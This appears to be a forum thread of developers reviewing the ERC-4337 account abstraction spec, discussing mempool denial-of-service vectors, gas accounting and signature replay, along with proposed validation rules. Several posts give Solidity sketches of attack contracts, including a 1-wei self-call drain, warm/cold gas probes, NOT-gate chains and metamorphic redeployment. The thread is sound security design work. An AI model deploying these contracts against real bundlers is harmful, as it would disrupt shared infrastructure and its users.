ERC 4337: Account Abstraction via Entry Point Contract specification

@tjade273 thinking some more about value-bearing calls, I realized that our current protection (dropping validations that change any account balance except the wallet and the entry point) is not good enough. The value-bearing call you suggested could be a self-call by some 3rd party account, so there’s no balance change. So the current protection won’t stop this DoS:

  1. Wallets call EvilContract.func() during validation.
  2. EvilContract.func() attempts to send 1 wei to its own receive function, reverting if that fails. While the contract holds 1 wei, the self-call leaves its balance unchanged, so the current protection does not catch it.
  3. Attacker sends ops from 1000 wallets with this validation function while EvilContract has 1 wei. Validations succeed and the ops are accepted to the mempool.
  4. Attacker tells EvilContract to send the 1 wei elsewhere.
  5. All ops fail validation in the 2nd simulation.
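
Steps 1–4 can be sketched as a minimal Solidity contract (the contract and function names are illustrative, not from the spec):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative sketch of the DoS contract described in steps 1-4.
contract EvilContract {
    // Called by the wallets' validation functions.
    function func() external {
        // Self-call with 1 wei: sender and receiver are the same
        // account, so the balance doesn't change and a "no balance
        // change except wallet/entry point" rule cannot detect it.
        // Fails once the 1 wei is drained.
        (bool ok,) = address(this).call{value: 1}("");
        require(ok, "no wei left");
    }

    // Accepts the self-transfer while the contract is funded.
    receive() external payable {}

    // Step 4: drain the 1 wei, invalidating every queued op whose
    // validation depends on func().
    function drain(address payable to) external {
        to.transfer(address(this).balance);
    }
}
```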

We’ll update the EIP to also ban value-bearing calls during validation, except from the wallet to the entry point.

Thanks again for your valuable comments.

@yoavw yes, this is essentially the attack I had in mind. I assumed that executing a value-bearing call in some sense triggered the rule

does not access mutable state of any contract except the wallet itself

from your last post, but yes, it bears being specific that this also applies to implicit reads via value-bearing calls.

Another interesting corner case I’ve been thinking about is:

Wallet calls C1, passing it say 500 gas. C1 attempts to call C2 (which just returns immediately). Since gas cost for first accesses is metered at a higher rate, the call to C1 succeeds exactly when C2 has been accessed before. So in simulation if the calls are simulated separately as they arrive at the mempool, they will behave differently from when they are all run together.
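
A sketch of such a probe, assuming EIP-2929 gas metering (2600 gas for a cold account access, 100 when warm); the exact gas stipend would need tuning:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative probe: with a tight gas stipend, the call to c2 can
// afford a warm account access (100 gas) but not a cold one
// (2600 gas, EIP-2929). Whether probe() reverts therefore leaks
// whether c2 was already touched earlier in the transaction.
contract C1 {
    address immutable c2;

    constructor(address _c2) { c2 = _c2; }

    // The wallet caps the gas it forwards to this function, so
    // little gas is left in this frame.
    function probe() external {
        // With fewer than ~2600 gas remaining, the CALL opcode
        // itself runs out of gas when c2 is cold, reverting
        // probe(); when c2 is warm the call goes through.
        (bool ok,) = c2.call("");
        (ok); // result unused; success is signaled by not reverting
    }
}
```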

It seems like this can be used to form a large scale DoS, unless all the userOps are simulated together in a batch (is this the case?).


The ops are also simulated together as eth_estimateGas of the entire handleOps transaction, but we do try to avoid cases where this simulation fails, because it creates more work. If it does fail, the simulation returns the index of the op in the bundle as an arg of the FailedOp error, and the bundler removes this op.

The method you described would indeed pass the single-op simulation and then fail the eth_estimateGas, which reverts with a FailedOp specifying that op; the bundler then removes it and retries.

It’s not as effective as the previous attack (value-bearing self calls) since it only invalidates ops in the current bundle rather than the entire mempool, and the attacker ends up paying for the first op in every bundle because this one is valid and not removed. But it is still a nuisance to the bundler which has to eth_estimateGas multiple times and only gets paid for one valid op.

I wonder if we should mitigate this. We could require all calls during validation to forward max gas, which would prevent this vector and hopefully shouldn't break any valid use case. On the other hand, the attack doesn't scale well for the attacker, because it only causes some off-chain work while paying on-chain costs in each bundle. What do you think?

The attacker may be able to get away with less than 1 successful op per batch if they test for previous accesses to an account that is likely to be called regardless of the attacker’s userVerify activity.

For example, a common paymaster that is likely to be used early in the batch, or even the externally owned account of the bundler themselves.

I’m trying to reason through the expected burden on a bundler due to this: is there any rate-limiting we can do to prevent users from filling up the mempool with a huge number of these invalid userOps? If the attacker sends 100k requests with the same wallet but different nonces, do these all get added to the mempool and crowd out real transactions? If so, maybe some sort of wallet blacklisting is warranted.

No, each wallet can only have one op in mempool at a time. The attacker needs to use 100k contract wallets in order to send 100k concurrent ops.

But… it may be possible to implement your attack without actually paying for these deployments. When a new wallet is deployed via EntryPoint, its validation is immediately called and the deployment is reverted if validation fails. You could craft a wallet that almost always reverts its own deployment op, costing the attacker nothing.

So you convinced me, we should add a max-gas rule during validation. We already require the use of fixed gas since we ban the GAS opcode, so we might as well require it to be max.

Thanks & keep them coming! 🙂


I think even with the max gas limitation there’s a similar issue.

The attacker just needs to calculate and set the verificationGas such that C1 runs out of gas only when address C2 is not primed. Then, if the call to C1 fails, pay the EntryPoint; if it succeeds, revert. There should be enough gas left over for this thanks to the 63/64ths rule (we can make the leftover gas as large as necessary by burning a bunch in C1).
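
A sketch of that shape (everything here is illustrative; the attacker would tune verificationGas off-chain so that C1's frame runs out of gas exactly when C2 is cold):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract C1 {
    address immutable c2;
    uint256 public sink;

    constructor(address _c2) { c2 = _c2; }

    function touch() external {
        // Burn a chunk of gas first: this inflates the total
        // verificationGas needed, and hence the 1/64 the wallet
        // retains under EIP-150, leaving it room to pay or revert.
        for (uint256 i = 0; i < 500; i++) { sink = i; }
        // Cold access to c2 costs 2600 gas vs. 100 warm (EIP-2929);
        // with verificationGas tuned tightly, this frame runs out
        // of gas exactly when c2 is cold.
        (bool ok,) = c2.call("");
        (ok);
    }
}

contract ProbeWallet {
    C1 immutable c1;
    address payable immutable entryPoint;

    constructor(C1 _c1, address payable _ep) { c1 = _c1; entryPoint = _ep; }

    function validateUserOp() external {
        // Forwards all-but-1/64 of the remaining gas (EIP-150).
        (bool warm,) = address(c1).call(abi.encodeWithSignature("touch()"));
        if (warm) revert();                            // c2 primed: invalidate the op
        (bool paid,) = entryPoint.call{value: 1}("");  // c2 cold: pay, look valid
        (paid);
    }
}
```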

One potential mitigation is to simulate the operation, then resimulate it with all of the called addresses primed, and make sure the contract pays in both cases.

Alternatively you could disallow all reverted calls, or just OOG calls, in the stack. This should work since the “real life” calls will always take at most as much gas as the simulated calls, so if no calls run out of gas in the simulation then they shouldn’t in “real life” either.

I’m not sure the 63/64 rule leaves enough gas to do anything in this case, since nodes won’t accept a high verificationGas op due to the risk of unpaid work. But you’re right, there’s a risk that this could be exploited, and the max gas change doesn’t mitigate it.

That won’t solve the problem either, because the contract could use a combination, expecting some addresses to be primed and others not. E.g. succeed if no addresses are primed or all addresses are primed, but fail if 2 are and 3 aren’t.

I think this is the way to go. The client should drop the op if there’s an OOG revert in any context. Thanks for suggesting that.

PEEPanEIP-4337: Account Abstraction via Entry Point Contract spec, with @yoavw and @kristofgazso


Reference to another great presentation about this proposal:

Slides: ETHAmsterdam ERC 4337 - Google Slides

Main links from the slides:
Contract code: account-abstraction/contracts at main · eth-infinitism/account-abstraction · GitHub
Audit blog post: EIP-4337 - Ethereum Account Abstraction Audit - OpenZeppelin blog


Do I get it right from the implementation here that:

  1. The user is required to have a prefund of callGas + verificationGas + preVerificationGas. Link. (Let’s discuss only the case when without the paymaster).
  2. At the same time, verification is allowed to consume the entire verification gas. Link.
  3. Also, the execution is allowed to consume the entire callGas. Link.
  4. The preVerificationGas is always paid entirely as it takes into account gas needed for posting calldata etc. Link.

These parameters do not take into account the additional overhead of creating auxiliary variables on the stack, etc. The preGas variables carry this overhead, and it is taken into account when paying fees to the beneficiary.

It seems possible that the user's operation consumes the entire verificationGas and callGas, so the user does not pay for the overhead mentioned above (i.e. these operations are done at the expense of the EntryPoint contract).

The code is taken from the OpenZeppelin’s report.

The preVerificationGas is supposed to cover this (yes, its name is a bit misleading).
We assume that all the variable costs are measured using "gas diffs" and that the overheads you describe are constants, so the bundler can calculate them and verify that the preVerificationGas pays for them.

Thank you @dror for your response. Could you help me see which step of my reasoning is wrong here (let's assume the tx was successful and there is no paymaster):

  1. Here we create a UserOpInfo with preOpGas equal to op.preVerificationGas + preGas - gasleft(). Let's say that preGas - gasleft() = op.verificationGas + k, where k is some constant. That means preOpGas = op.preVerificationGas + op.verificationGas + k.
  2. Here, when the tx is actually executed, the actual cost is returned. The preOpGas is added to it, so in the worst case the returned actual gas is at least op.callGas + preOpGas = op.callGas + op.preVerificationGas + op.verificationGas + k.

The prefund that the user was required to have at the start of the transaction is op.callGas + op.preVerificationGas + op.verificationGas, but the actual gas spent was op.callGas + op.preVerificationGas + op.verificationGas + k. The question is: who pays for k? Here we subtract the actualGasCost from the prefund, so if the prefund is smaller than the actual gas cost, the transaction will revert.

Indeed, the EntryPoint will not lose any money, but the operator should always remember that the operation is never guaranteed to succeed unless the verification step used little enough gas that the difference covers k.

The EIP states that:

To prevent replay attacks (both cross-chain and multiple EntryPoint implementations), the signature should depend on chainid and the EntryPoint address.

This makes sense given EIP-155.

Just so it’s clear for me, the reason the EIP doesn’t define how this signature is calculated over the data is because any signing and hashing algorithm (within reason) can be used?

For example, to calculate the hash of a message before creating a signature in Ethereum it is common to do the following:

Keccak256("\x19Ethereum Signed Message:\n32" + Keccak256(message))

So is the reason this ERC isn’t prescriptive like the example above due to the flexibility it offers with respect to crypto algorithms?

Therefore, validateUserOp on the wallet contract must make sure that it accounts for the chainId and the EntryPoint (as well as the UserOperation) when checking the signature's validity.
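
A sketch of such a check in the wallet, using the EIP-191 style from the example above (the exact hash layout, function signature, and the OpenZeppelin ECDSA helper are illustrative, not mandated by the ERC):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "@openzeppelin/contracts/utils/cryptography/ECDSA.sol";

contract Wallet {
    address public owner;
    address public entryPoint;

    // Illustrative: the digest binds the op to this chain and this
    // EntryPoint, so a signature cannot be replayed on another
    // chain or against another EntryPoint implementation.
    function validateUserOp(bytes32 userOpHash, bytes calldata sig)
        external view
    {
        bytes32 digest = keccak256(
            abi.encode(userOpHash, block.chainid, entryPoint)
        );
        bytes32 ethHash = ECDSA.toEthSignedMessageHash(digest);
        require(ECDSA.recover(ethHash, sig) == owner, "bad sig");
    }
}
```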

Minor comment: I think a more descriptive term for “paymaster” can be “sponsor”.


Exactly. The wallet has the flexibility (and responsibility) to use whatever signature scheme it wants.
The "SampleWallet" we provide uses this EIP-191 "Ethereum Signed Message" signature. We also added a reference implementation that uses BLS signatures.

Is the current draft (EIP-4337: Account Abstraction via Entry Point Contract specification) up to date? I’m working on implementing 4337, but I see some inconsistencies between the EIP and the EntryPoint implementation.

For example, the EIP states the following rule:

Any GAS opcode is followed immediately by one of { CALL, DELEGATECALL, CALLCODE, STATICCALL }.

however, in the implementation repository, the example contains the following code:

  //pay required prefund. make sure NOT to use the "gas" opcode, which is banned during validateUserOp
  // (and is used by default by "call")
  (bool success,) = payable(msg.sender).call{value : requiredPrefund, gas : type(uint).max}("");
  (success); // silence the unused-variable warning
  //ignore failure (it's EntryPoint's job to verify, not the wallet's)

So it's not clear if GAS is allowed or not (when used right before CALL, DELEGATECALL, etc.). This is an important detail because proxy contracts (see EIP-1167) use the GAS opcode when forwarding the call. If this exception to the rule doesn't exist, then wallets that use these proxies wouldn't be compatible.


An unrelated thing:

Also, while simulating the op there is a list of rules the client must enforce, but I see that CALL to external contracts is allowed as long as value = 0. I think this is not enough to stop a 3rd-party contract from invalidating a large set of user operations:

  1. During validation, CALL address X with value = 0 and any data; address X is a non-deployed contract, so it has no code and the call doesn't fail.
  2. Deploy a contract at address X; the contract calls address Y and reverts unless that call fails.
  3. Deploy a contract at address Y; the contract calls address Z and reverts unless that call fails.
  4. This enables toggling an arbitrary number of operations between valid and invalid.

This can be built as an ever-expanding chain of NOT gates. I think a way to mitigate this issue is adding a rule that during validation the wallet is not allowed to call addresses with empty code.
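
The chain of NOT gates might look like this (illustrative):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative NOT gate: succeeds iff the call to `next` fails.
// The chain head sits at address X; deploying one more link at the
// far end flips the result observed by every wallet calling X.
contract NotGate {
    address immutable next;

    constructor(address _next) { next = _next; }

    fallback() external {
        (bool ok,) = next.call("");
        require(!ok, "next succeeded, so this gate reverts");
    }
}
```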

The latest changes haven’t been merged to the official repo yet. They’re mainly related to signature aggregation but contain a few other minor changes. It’ll be merged very soon. The place to see the latest pending changes is https://github.com/eth-infinitism/account-abstraction/blob/develop/eip/EIPS/eip-4337.md

It is allowed. GAS is a forbidden opcode, but there's an exception that allows it just before a *CALL, which immediately consumes it from the stack. The rationale is that the code should not be able to access this information and change its flow based on it, but calls are fine. Since the GAS value is not available to the code, the only way it could affect the flow is if a function runs out of gas. But rule 7 precludes that, by banning out-of-gas calls:

  1. No CALL, DELEGATECALL, CALLCODE, STATICCALL results in an out-of-gas revert.

So the exception described in the EIP is the correct one. The EntryPoint code also doesn’t enforce it since it’s handled by the bundler. What’s wrong is the comment in the code, which doesn’t mention the *CALL exception.

At that point rule 9 kicks in:

  1. EXTCODEHASH of every address accessed (by any opcode) does not change between first and second simulations of the op.

Any op that accesses address X gets dropped from the mempool without simulation. What the EIP tries to avoid is having to re-simulate a large number of ops in order to drop them. During the first simulation, the bundler saves a list of accessed addresses. Since any code change would trigger rule 9, these ops would be invalidated without additional work.

That actually wouldn’t mitigate the issue, since the contract at address X can be selfdestructed and redeployed differently each time using some well-known constructor tricks. The attack would start with a contract at address X that doesn’t revert, then toggle it by selfdestructing and recreating it (in a single transaction) in order to invalidate a large number of ops. But I think rule 9 above does offer sufficient mitigation. Do you see a way around it?
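
For reference, the "constructor trick" here is the metamorphic-contract pattern: the CREATE2 address depends only on the deployer, salt, and init code, while the constructor can fetch the runtime code from the factory, so after a SELFDESTRUCT the same address can be recreated with different behavior. A rough sketch (names are illustrative):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// The init code of Metamorphic is constant, so CREATE2 with a fixed
// salt always yields the same address; the runtime code it installs
// is whatever the factory currently serves.
contract Metamorphic {
    constructor() {
        (, bytes memory raw) = msg.sender.staticcall(
            abi.encodeWithSignature("nextRuntimeCode()")
        );
        bytes memory code = abi.decode(raw, (bytes));
        // Return the fetched bytes as this contract's runtime code.
        assembly { return(add(code, 32), mload(code)) }
    }
}

contract Factory {
    bytes public nextRuntimeCode;

    function setCode(bytes calldata c) external { nextRuntimeCode = c; }

    // After the previous incarnation selfdestructs, redeploying with
    // the same salt recreates the same address with new behavior.
    function redeploy(bytes32 salt) external returns (address) {
        return address(new Metamorphic{salt: salt}());
    }
}
```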


What’s stopping the wallet from re-broadcasting the transaction? You could mutate the transaction a bit and re-broadcast it, spamming the mempool without any additional cost. I assume the client can block the wallet, but then a sort of “per-wallet reputation” starts to come into play too.

Yes, but I’m assuming that SELFDESTRUCT will get deactivated soon enough.

We’d rather avoid per-wallet reputation. We only have that for paymasters. But this attack does have a cost to the attacker, probably higher than the damage it causes. In order to propagate through the mempool, the op must be valid at the time of propagation. The attacker has to invalidate it after it has been propagated, by deploying a contract. The attacker also has to deploy a large number of wallets in order to fill the mempool, because each wallet can have only one op in the mempool at any given time.

So the attacker has a one-time setup cost of O(concurrent_ops) for setting up the wallets, and then O(iterations) for deploying a new contract on each iteration. And the damage is a single off-chain simulation for each iteration of the attack, since the 2nd simulation never happens due to rule 9.

I agree it would be better to mitigate it entirely, rather than relying on the cost and unprofitability of the attack. But how would you block it without breaking too much functionality? Preventing calls to accounts without code is a good idea and shouldn’t break anything, but doesn’t block the attack due to selfdestruct and recreate.

It’ll be deactivated, but I don’t know about “soon enough”. We did consider having a rule where contracts touched during validation must not have the selfdestruct opcode, but it wasn’t good enough because the contract could delegatecall to an unknown address (specified in the op rather than in the code), and that address could selfdestruct. Preventing delegatecall to unknown addresses seems too harsh.
